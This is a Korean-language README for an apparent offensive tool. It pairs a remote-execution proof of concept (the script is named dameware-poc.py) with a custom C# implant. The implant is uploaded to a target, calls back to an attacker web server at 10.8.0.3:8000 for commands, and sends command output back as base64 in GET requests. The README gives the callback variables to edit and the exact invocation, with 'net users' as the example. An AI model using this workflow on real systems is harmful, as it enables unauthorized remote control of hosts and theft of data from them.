
이 저장소는 사용자 지정 C# 실행 파일과 함께 Nessus POC를 활용하여 원격 호스트에서 명령을 실행하고 해당 명령의 출력을 가져오기 위해 만들어졌습니다.
python 파일은 웹 서버를 시작하고, 익스플로잇을 실행한 다음, 웹 서버를 통해 결과를 가져오는 데 사용됩니다.
C# exe는 익스플로잇을 통해 대상에 업로드됩니다.
대상에서 실행되면 exe는 지정된 IP/포트로 콜백하여 실행할 명령을 가져옵니다(경로는 /cmd).
명령이 완료되면 exe는 출력을 동일한 웹 서버로 보냅니다.
출력 전송은 404를 생성하는 GET 요청을 통해 이루어지지만 괜찮습니다. 우리가 필요한 것은 base64 데이터뿐입니다.
C# exe에는 업데이트해야 할 두 개의 변수가 있습니다.
이 변수들은 공격 시스템의 IP와 포트를 참조합니다.
string ip = "10.8.0.3";
string port = "8000";
python dameware-poc.py -t target_ip -e executable_to_upload
아래 예제는 원격 호스트에서 net users 명령을 실행합니다.
